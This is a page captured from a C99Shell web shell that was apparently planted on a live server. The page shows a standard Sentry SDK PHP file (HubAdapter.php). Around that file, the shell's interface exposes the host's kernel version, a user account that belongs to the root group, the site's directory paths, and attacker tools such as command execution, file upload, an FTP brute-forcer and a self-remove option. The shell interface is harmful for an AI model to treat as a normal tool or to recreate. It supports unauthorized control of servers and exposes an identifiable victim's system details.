!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/sentry/sentry/src/State/   drwxr-xr-x
Free 29.13 GB of 117.98 GB (24.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     HubAdapter.php (5.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Sentry\State;

use 
Sentry\Breadcrumb;
use 
Sentry\CheckInStatus;
use 
Sentry\ClientInterface;
use 
Sentry\Event;
use 
Sentry\EventHint;
use 
Sentry\EventId;
use 
Sentry\Integration\IntegrationInterface;
use 
Sentry\MonitorConfig;
use 
Sentry\SentrySdk;
use 
Sentry\Severity;
use 
Sentry\Tracing\Span;
use 
Sentry\Tracing\Transaction;
use 
Sentry\Tracing\TransactionContext;

/**
 * An implementation of {@see HubInterface} that uses {@see SentrySdk} internally
 * to manage the current hub.
 */
final class HubAdapter implements HubInterface
{
    
/**
     * @var self|null The single instance which forwards all calls to {@see SentrySdk}
     */
    
private static $instance;

    
/**
     * Constructor.
     */
    
private function __construct()
    {
    }

    
/**
     * Gets the instance of this class. This is a singleton, so once initialized
     * you will always get the same instance.
     */
    
public static function getInstance(): self
    
{
        if (
null === self::$instance) {
            
self::$instance = new self();
        }

        return 
self::$instance;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getClient(): ?ClientInterface
    
{
        return 
SentrySdk::getCurrentHub()->getClient();
    }

    
/**
     * {@inheritdoc}
     */
    
public function getLastEventId(): ?EventId
    
{
        return 
SentrySdk::getCurrentHub()->getLastEventId();
    }

    
/**
     * {@inheritdoc}
     */
    
public function pushScope(): Scope
    
{
        return 
SentrySdk::getCurrentHub()->pushScope();
    }

    
/**
     * {@inheritdoc}
     */
    
public function popScope(): bool
    
{
        return 
SentrySdk::getCurrentHub()->popScope();
    }

    
/**
     * {@inheritdoc}
     */
    
public function withScope(callable $callback)
    {
        return 
SentrySdk::getCurrentHub()->withScope($callback);
    }

    
/**
     * {@inheritdoc}
     */
    
public function configureScope(callable $callback): void
    
{
        
SentrySdk::getCurrentHub()->configureScope($callback);
    }

    
/**
     * {@inheritdoc}
     */
    
public function bindClient(ClientInterface $client): void
    
{
        
SentrySdk::getCurrentHub()->bindClient($client);
    }

    
/**
     * {@inheritdoc}
     */
    
public function captureMessage(string $message, ?Severity $level null, ?EventHint $hint null): ?EventId
    
{
        return 
SentrySdk::getCurrentHub()->captureMessage($message$level$hint);
    }

    
/**
     * {@inheritdoc}
     */
    
public function captureException(\Throwable $exception, ?EventHint $hint null): ?EventId
    
{
        return 
SentrySdk::getCurrentHub()->captureException($exception$hint);
    }

    
/**
     * {@inheritdoc}
     */
    
public function captureEvent(Event $event, ?EventHint $hint null): ?EventId
    
{
        return 
SentrySdk::getCurrentHub()->captureEvent($event$hint);
    }

    
/**
     * {@inheritdoc}
     */
    
public function captureLastError(?EventHint $hint null): ?EventId
    
{
        return 
SentrySdk::getCurrentHub()->captureLastError($hint);
    }

    
/**
     * {@inheritdoc}
     *
     * @param int|float|null $duration
     */
    
public function captureCheckIn(string $slugCheckInStatus $status$duration null, ?MonitorConfig $monitorConfig null, ?string $checkInId null): ?string
    
{
        return 
SentrySdk::getCurrentHub()->captureCheckIn($slug$status$duration$monitorConfig$checkInId);
    }

    
/**
     * {@inheritdoc}
     */
    
public function addBreadcrumb(Breadcrumb $breadcrumb): bool
    
{
        return 
SentrySdk::getCurrentHub()->addBreadcrumb($breadcrumb);
    }

    
/**
     * {@inheritdoc}
     */
    
public function getIntegration(string $className): ?IntegrationInterface
    
{
        return 
SentrySdk::getCurrentHub()->getIntegration($className);
    }

    
/**
     * {@inheritdoc}
     *
     * @param array<string, mixed> $customSamplingContext Additional context that will be passed to the {@see SamplingContext}
     */
    
public function startTransaction(TransactionContext $context, array $customSamplingContext = []): Transaction
    
{
        return 
SentrySdk::getCurrentHub()->startTransaction($context$customSamplingContext);
    }

    
/**
     * {@inheritdoc}
     */
    
public function getTransaction(): ?Transaction
    
{
        return 
SentrySdk::getCurrentHub()->getTransaction();
    }

    
/**
     * {@inheritdoc}
     */
    
public function getSpan(): ?Span
    
{
        return 
SentrySdk::getCurrentHub()->getSpan();
    }

    
/**
     * {@inheritdoc}
     */
    
public function setSpan(?Span $span): HubInterface
    
{
        return 
SentrySdk::getCurrentHub()->setSpan($span);
    }

    
/**
     * @see https://www.php.net/manual/en/language.oop5.cloning.php#object.clone
     */
    
public function __clone()
    {
        throw new 
\BadMethodCallException('Cloning is forbidden.');
    }

    
/**
     * @see https://www.php.net/manual/en/language.oop5.magic.php#object.wakeup
     */
    
public function __wakeup()
    {
        throw new 
\BadMethodCallException('Unserializing instances of this class is forbidden.');
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--